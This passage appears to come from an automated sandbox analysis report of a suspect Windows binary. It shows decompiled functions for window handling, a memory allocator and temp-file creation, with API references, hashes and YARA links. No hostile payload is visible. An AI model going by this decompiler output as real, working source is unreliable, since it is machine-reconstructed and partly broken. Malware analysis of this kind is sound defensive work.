						return SetWindowPos( *( *_t29 + 0x188), 0, 0, 0, 0, 0, 0x57);
					} else {
						_t33 =  *0x6cdec4; // 0x6d579c
						return ShowWindow( *( *_t33 + 0x188), 5);
					}
				}
				return _t18;
			}













                                                            0x006ae6f9
                                                            0x006ae6ff
                                                            0x006ae704
                                                            0x006ae71b
                                                            0x006ae720
                                                            0x006ae735
                                                            0x006ae743
                                                            0x006ae748
                                                            0x006ae758
                                                            0x006ae75f
                                                            0x006ae768
                                                            0x006ae761
                                                            0x006ae761
                                                            0x006ae761
                                                            0x006ae76d
                                                            0x006ae77f
                                                            0x006ae786
                                                            0x006ae7ab
                                                            0x00000000
                                                            0x006ae788
                                                            0x006ae78a
                                                            0x00000000
                                                            0x006ae798
                                                            0x006ae786
                                                            0x006ae7bf

                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 006AE714
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,006B78BD,00000000,006B81F9), ref: 006AE743
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 006AE758
                                                            • SetWindowLongW.USER32 ref: 006AE77F
                                                            • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 006AE798
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 006AE7B9
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Window$Long$Show
                                                            • String ID:
                                                            • API String ID: 3609083571-0
                                                            • Opcode ID: 5cdc2a2f03025ac3e3b3afbb97f1bf29b70dcad7f16aa9e547f2343e461a08eb
                                                            • Instruction ID: c5f2d3f14be40374ea6ae40072baf741f42d7864aa45c80e1917733d0618a2ec
                                                            • Opcode Fuzzy Hash: 5cdc2a2f03025ac3e3b3afbb97f1bf29b70dcad7f16aa9e547f2343e461a08eb
                                                            • Instruction Fuzzy Hash: FC111C75745200AFD700EB68DD81FE237EAAB9E314F4541A5F6158F3E2CA65EC40DB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405A04, Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 68%
                                                            			E00405A04(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				intOrPtr* _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				intOrPtr* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				intOrPtr* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t95 = __eax;
				_t129 =  *0x6cf05d; // 0x0
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t2 = _t162 + 0x10010; // 0x10110
							_t156 = _t2 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t121 = VirtualAlloc(0, _t156, 0x101000, 4);
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E00405764();
								_t99 =  *0x6d1b84; // 0x6d1b80
								 *_t147 = 0x6d1b80;
								 *0x6d1b84 = _t121;
								 *((intOrPtr*)(_t147 + 4)) = _t99;
								 *_t99 = _t121;
								 *0x6d1b7c = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t67 = _t95 + 0xd3; // 0x1d3
						_t125 = (_t67 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x6cfaec], ah");
								if(__eflags == 0) {
									goto L42;
								}
								asm("pause");
								__eflags =  *0x6cf98d;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									asm("lock cmpxchg [0x6cfaec], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L42;
							}
						}
						L42:
						_t68 = _t125 - 0xb30; // -2445
						_t141 = _t68;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x6cfafc + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x6cfaf8;
							if((0xfffffffe << _t132 &  *0x6cfaf8) == 0) {
								_t133 =  *0x6cfaf4; // 0x0
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E004056E8(_t125);
								} else {
									_t110 =  *0x6cfaf0; // 0x36b3970
									_t109 = _t110 - _t125;
									 *0x6cfaf0 = _t109;
									 *0x6cfaf4 = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x6cfaec = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L50;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L50:
							_push(_t152);
							_push(_t145);
							_t148 = 0x6cfb7c + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x6cfafc + _t142 * 4;
								 *_t80 =  *(0x6cfafc + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x6cfaf8], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E0040561C(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							_t93 = _t125 + 2; // 0x1a5
							 *(_t159 - 4) = _t93;
							 *0x6cfaec = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					_t6 = __edx + 0x6cf994; // 0xc8c8c8c8
					__eax =  *_t6 & 0x000000ff;
					__ebx = 0x6c5084 + ( *_t6 & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									asm("pause");
									__eflags =  *0x6cf98d;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [ebx], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 8);
					__eax =  *(__edx + 0x10);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x18);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0x14);
						if(__eax >  *(__ebx + 0x14)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x6cf05d;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x6cfaec], ah");
									if(__eflags == 0) {
										goto L22;
									}
									asm("pause");
									__eflags =  *0x6cf98d;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [0x6cfaec], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
									goto L22;
								}
							}
							L22:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x6cfaf8;
							__eflags =  *(__ebx + 1) &  *0x6cfaf8;
							if(( *(__ebx + 1) &  *0x6cfaf8) == 0) {
								__ecx =  *(__ebx + 4) & 0x0000ffff;
								__edi =  *0x6cfaf4; // 0x0
								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
									__eax =  *(__ebx + 6) & 0x0000ffff;
									__edi = __eax;
									__eax = E004056E8(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L35;
									} else {
										 *0x6cfaec = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x6cfaf0; // 0x36b3970
									__ecx =  *(__ebx + 6) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x6cfaf4 =  *0x6cfaf4 - __edi;
									 *0x6cfaf0 = __esi;
									goto L35;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x6cfafc + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x6cfafc + __eax * 4) + __eax * 8 * 4;
								__edi = 0x6cfb7c + ( *(0x6cfafc + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x6cfafc + __eax * 4;
									 *_t38 =  *(0x6cfafc + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
									if( *_t38 == 0) {
										asm("btr [0x6cfaf8], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 6) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E0040561C(__eax, __ecx, __edx);
								}
								L35:
								_t56 = __edi + 6; // 0x6
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x6cfaec = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 0x10)) = 0;
								 *((intOrPtr*)(__esi + 0x14)) = 1;
								 *(__ebx + 0x18) = __esi;
								_t61 = __esi + 0x20; // 0x36b3990
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 0x10) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0x14) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0x14;
							 *_t19 =  *(__edx + 0x14) + 1;
							__eflags =  *_t19;
							 *(__ebx + 0x10) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 0x10) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 8);
							 *(__ecx + 0xc) = __ebx;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}





























                                                            0x00405a04
                                                            0x00405a10
                                                            0x00405a16
                                                            0x00405c64
                                                            0x00405c69
                                                            0x00405d7c
                                                            0x00405d7d
                                                            0x00405d7f
                                                            0x004057b0
                                                            0x004057b4
                                                            0x004057b6
                                                            0x004057c0
                                                            0x004057d5
                                                            0x004057d9
                                                            0x004057db
                                                            0x004057dd
                                                            0x004057e3
                                                            0x004057e6
                                                            0x004057eb
                                                            0x004057f0
                                                            0x004057f6
                                                            0x004057fc
                                                            0x004057ff
                                                            0x00405801
                                                            0x00405808
                                                            0x00405808
                                                            0x00405811
                                                            0x00405d85
                                                            0x00405d85
                                                            0x00405d87
                                                            0x00405d87
                                                            0x00405c6f
                                                            0x00405c6f
                                                            0x00405c7b
                                                            0x00405c7e
                                                            0x00405c80
                                                            0x00405c28
                                                            0x00405c2d
                                                            0x00405c35
                                                            0x00000000
                                                            0x00000000
                                                            0x00405c37
                                                            0x00405c39
                                                            0x00405c40
                                                            0x00000000
                                                            0x00405c42
                                                            0x00405c44
                                                            0x00405c4e
                                                            0x00405c56
                                                            0x00405c5a
                                                            0x00000000
                                                            0x00405c5a
                                                            0x00405c56
                                                            0x00000000
                                                            0x00405c40
                                                            0x00405c28
                                                            0x00405c82
                                                            0x00405c82
                                                            0x00405c82
                                                            0x00405c8a
                                                            0x00405c8d
                                                            0x00405c97
                                                            0x00405c97
                                                            0x00405c9e
                                                            0x00405cb1
                                                            0x00405cb5
                                                            0x00405cbb
                                                            0x00405cd4
                                                            0x00405cda
                                                            0x00405cda
                                                            0x00405cdc
                                                            0x00405cfa
                                                            0x00405cde
                                                            0x00405cde
                                                            0x00405ce3
                                                            0x00405ce5
                                                            0x00405cea
                                                            0x00405cf3
                                                            0x00405cf3
                                                            0x00405cff
                                                            0x00405d07
                                                            0x00405cbd
                                                            0x00405cbd
                                                            0x00405cc7
                                                            0x00405ccf
                                                            0x00000000
                                                            0x00405ccf
                                                            0x00405ca0
                                                            0x00405ca3
                                                            0x00405ca6
                                                            0x00405d08
                                                            0x00405d08
                                                            0x00405d09
                                                            0x00405d0a
                                                            0x00405d11
                                                            0x00405d14
                                                            0x00405d17
                                                            0x00405d1a
                                                            0x00405d1c
                                                            0x00405d1e
                                                            0x00405d25
                                                            0x00405d27
                                                            0x00405d27
                                                            0x00405d27
                                                            0x00405d2e
                                                            0x00405d30
                                                            0x00405d30
                                                            0x00405d2e
                                                            0x00405d3c
                                                            0x00405d41
                                                            0x00405d41
                                                            0x00405d43
                                                            0x00405d64
                                                            0x00405d64
                                                            0x00405d64
                                                            0x00405d45
                                                            0x00405d45
                                                            0x00405d4b
                                                            0x00405d4e
                                                            0x00405d52
                                                            0x00405d58
                                                            0x00405d5a
                                                            0x00405d5a
                                                            0x00405d58
                                                            0x00405d69
                                                            0x00405d6c
                                                            0x00405d6f
                                                            0x00405d7b
                                                            0x00405d7b
                                                            0x00405c9e
                                                            0x00405a1c
                                                            0x00405a1c
                                                            0x00405a1e
                                                            0x00405a1e
                                                            0x00405a25
                                                            0x00405a2c
                                                            0x00405a84
                                                            0x00405a84
                                                            0x00405a89
                                                            0x00405a8d
                                                            0x00000000
                                                            0x00000000
                                                            0x00405a8f
                                                            0x00405a8f
                                                            0x00405a92
                                                            0x00405a97
                                                            0x00405a9b
                                                            0x00405a9d
                                                            0x00405a9d
                                                            0x00405aa0
                                                            0x00405aa5
                                                            0x00405aa9
                                                            0x00405aab
                                                            0x00405aae
                                                            0x00405ab0
                                                            0x00405ab7
                                                            0x00000000
                                                            0x00405ab9
                                                            0x00405abb
                                                            0x00405ac0
                                                            0x00405ac5
                                                            0x00405ac9
                                                            0x00405ad1
                                                            0x00000000
                                                            0x00405ad1
                                                            0x00405ac9
                                                            0x00405ab7
                                                            0x00405aa9
                                                            0x00000000
                                                            0x00405a9b
                                                            0x00405a84
                                                            0x00405a2e
                                                            0x00405a2e
                                                            0x00405a31
                                                            0x00405a34
                                                            0x00405a39
                                                            0x00405a3b
                                                            0x00405a54
                                                            0x00405a57
                                                            0x00405a5b
                                                            0x00405a5d
                                                            0x00405a60
                                                            0x00405ad8
                                                            0x00405ad9
                                                            0x00405ada
                                                            0x00405ae1
                                                            0x00405ae3
                                                            0x00405ae3
                                                            0x00405ae8
                                                            0x00405af0
                                                            0x00000000
                                                            0x00000000
                                                            0x00405af2
                                                            0x00405af4
                                                            0x00405afb
                                                            0x00000000
                                                            0x00405afd
                                                            0x00405aff
                                                            0x00405b04
                                                            0x00405b09
                                                            0x00405b11
                                                            0x00405b15
                                                            0x00000000
                                                            0x00405b15
                                                            0x00405b11
                                                            0x00000000
                                                            0x00405afb
                                                            0x00405ae3
                                                            0x00405b1c
                                                            0x00405b20
                                                            0x00405b20
                                                            0x00405b26
                                                            0x00405b98
                                                            0x00405b9c
                                                            0x00405ba2
                                                            0x00405ba4
                                                            0x00405bcc
                                                            0x00405bd0
                                                            0x00405bd2
                                                            0x00405bd7
                                                            0x00405bd9
                                                            0x00405bdb
                                                            0x00000000
                                                            0x00405bdd
                                                            0x00405bdd
                                                            0x00405be2
                                                            0x00405be4
                                                            0x00405be5
                                                            0x00405be6
                                                            0x00405be7
                                                            0x00405be7
                                                            0x00405ba6
                                                            0x00405ba6
                                                            0x00405bac
                                                            0x00405bb0
                                                            0x00405bb6
                                                            0x00405bb8
                                                            0x00405bba
                                                            0x00405bba
                                                            0x00405bbc
                                                            0x00405bbe
                                                            0x00405bc4
                                                            0x00000000
                                                            0x00405bc4
                                                            0x00405b28
                                                            0x00405b28
                                                            0x00405b2b
                                                            0x00405b32
                                                            0x00405b39
                                                            0x00405b3c
                                                            0x00405b3f
                                                            0x00405b46
                                                            0x00405b49
                                                            0x00405b4c
                                                            0x00405b4f
                                                            0x00405b51
                                                            0x00405b53
                                                            0x00405b55
                                                            0x00405b5a
                                                            0x00405b5c
                                                            0x00405b5c
                                                            0x00405b5c
                                                            0x00405b63
                                                            0x00405b65
                                                            0x00405b65
                                                            0x00405b63
                                                            0x00405b6c
                                                            0x00405b71
                                                            0x00405b74
                                                            0x00405b7a
                                                            0x00405be8
                                                            0x00405be8
                                                            0x00405be8
                                                            0x00405b7c
                                                            0x00405b7c
                                                            0x00405b7e
                                                            0x00405b82
                                                            0x00405b84
                                                            0x00405b87
                                                            0x00405b8a
                                                            0x00405b8d
                                                            0x00405b91
                                                            0x00405b91
                                                            0x00405bed
                                                            0x00405bed
                                                            0x00405bed
                                                            0x00405bf0
                                                            0x00405bf3
                                                            0x00405bf5
                                                            0x00405bfa
                                                            0x00405bfc
                                                            0x00405bff
                                                            0x00405c06
                                                            0x00405c09
                                                            0x00405c09
                                                            0x00405c0c
                                                            0x00405c10
                                                            0x00405c13
                                                            0x00405c16
                                                            0x00405c18
                                                            0x00405c18
                                                            0x00405c1a
                                                            0x00405c1d
                                                            0x00405c20
                                                            0x00405c23
                                                            0x00405c24
                                                            0x00405c25
                                                            0x00405c26
                                                            0x00405c26
                                                            0x00405a62
                                                            0x00405a62
                                                            0x00405a62
                                                            0x00405a62
                                                            0x00405a66
                                                            0x00405a69
                                                            0x00405a6c
                                                            0x00405a6f
                                                            0x00405a70
                                                            0x00405a70
                                                            0x00405a3d
                                                            0x00405a3d
                                                            0x00405a41
                                                            0x00405a41
                                                            0x00405a44
                                                            0x00405a47
                                                            0x00405a4a
                                                            0x00405a74
                                                            0x00405a77
                                                            0x00405a7a
                                                            0x00405a7d
                                                            0x00405a80
                                                            0x00405a81
                                                            0x00405a4c
                                                            0x00405a4c
                                                            0x00405a4f
                                                            0x00405a50
                                                            0x00405a50
                                                            0x00405a4a
                                                            0x00405a3b

                                                            APIs
                                                            • Sleep.KERNEL32(00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405ABB
                                                            • Sleep.KERNEL32(0000000A,00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AD1
                                                            • Sleep.KERNEL32(00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AFF
                                                            • Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405B15
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: d5c76b6411e5b1297fee21c622a9732816c4700a6e5391fd7fe9993b0e9394e2
                                                            • Instruction ID: 7a051e160dd760b70f5de690832b1da94a718f6c47d0b95a7d4eebd5f387ad29
                                                            • Opcode Fuzzy Hash: d5c76b6411e5b1297fee21c622a9732816c4700a6e5391fd7fe9993b0e9394e2
                                                            • Instruction Fuzzy Hash: BCC1F272601B118BDB15CF69E884B27BBA2EB85310F18827FD4599F3D5C7B4A841CF94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060D3B4, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 39%
                                                            			E0060D3B4(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v17;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				void* _t60;
				signed int _t63;
				intOrPtr _t77;
				void* _t83;
				intOrPtr _t86;

				_t64 = 0;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v16 = __edx;
				_v8 = __eax;
				E0040A2AC(_v8);
				_push(_t86);
				_push(0x60d4f1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t86;
				E005C4EA4(_v8,  &_v24);
				E0040A5F0( &_v8, _v24);
				_t83 = 0x123456;
				_t63 = 0;
				_v17 = 0;
				do {
					_t83 = _t83 + 1;
					if(_t83 > 0x1ffffff) {
						_t83 = 0;
					}
					_t90 = 0x123456 - _t83;
					if(0x123456 == _t83) {
						_t9 =  &_v32; // 0x6b7447
						E005C567C(_v8, _t64, _t9, _t90);
						_t11 =  &_v32; // 0x6b7447
						E005CD508(0x5a,  &_v28,  *_t11);
						_t64 = _v28;
						E00429008(_v28, 1);
						E004098C4();
					}
					_push(_v8);
					_push("_iu");
					E0060D21C(_t83, _t63,  &_v36, 0x123456, _t83);
					_push(_v36);
					_push(L".tmp");
					E0040B550( &_v12, _t63, 4, 0x123456, _t83);
					if(E005C6880(_t90) == 0) {
						_t63 = 1;
						_v17 = E005C685C(_v12);
						if(_v17 != 0) {
							_t60 = CreateFileW(E0040B278(_v12), 0xc0000000, 0, 0, 2, 0x80, 0);
							_t63 = 0 | _t60 != 0xffffffff;
							if(1 != 0) {
								CloseHandle(_t60);
							}
						}
					}
				} while (_t63 == 0);
				E0040A5A8(_v16, _v12);
				_pop(_t77);
				 *[fs:eax] = _t77;
				_push(E0060D4F8);
				E0040A228( &_v36, 4);
				return E0040A228( &_v12, 2);
			}
















                                                            0x0060d3b7
                                                            0x0060d3b9
                                                            0x0060d3ba
                                                            0x0060d3bb
                                                            0x0060d3bc
                                                            0x0060d3bd
                                                            0x0060d3be
                                                            0x0060d3bf
                                                            0x0060d3c0
                                                            0x0060d3c4
                                                            0x0060d3c7
                                                            0x0060d3cd
                                                            0x0060d3d4
                                                            0x0060d3d5
                                                            0x0060d3da
                                                            0x0060d3dd
                                                            0x0060d3e6
                                                            0x0060d3f1
                                                            0x0060d3fb
                                                            0x0060d3fd
                                                            0x0060d3ff
                                                            0x0060d403
                                                            0x0060d403
                                                            0x0060d40a
                                                            0x0060d40c
                                                            0x0060d40c
                                                            0x0060d40e
                                                            0x0060d410
                                                            0x0060d412
                                                            0x0060d418
                                                            0x0060d41d
                                                            0x0060d427
                                                            0x0060d42c
                                                            0x0060d436
                                                            0x0060d43b
                                                            0x0060d43b
                                                            0x0060d440
                                                            0x0060d443
                                                            0x0060d44d
                                                            0x0060d452
                                                            0x0060d455
                                                            0x0060d462
                                                            0x0060d471
                                                            0x0060d473
                                                            0x0060d47d
                                                            0x0060d484
                                                            0x0060d4a1
                                                            0x0060d4a9
                                                            0x0060d4ae
                                                            0x0060d4b1
                                                            0x0060d4b1
                                                            0x0060d4ae
                                                            0x0060d484
                                                            0x0060d4b6
                                                            0x0060d4c4
                                                            0x0060d4cb
                                                            0x0060d4ce
                                                            0x0060d4d1
                                                            0x0060d4de
                                                            0x0060d4f0

                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseCreateFileHandle
                                                            • String ID: .tmp$Gtk$_iu
                                                            • API String ID: 3498533004-1320520068
                                                            • Opcode ID: 8f4bd8aeb1207aa4b07bf03847036b0a2b10865cd30baef83bcbefd08e77ff22
                                                            • Instruction ID: 38fd5bd3aef28e796ac18a57f9f91bd27b67d48edde35eb58a18837c564f9665
                                                            • Opcode Fuzzy Hash: 8f4bd8aeb1207aa4b07bf03847036b0a2b10865cd30baef83bcbefd08e77ff22
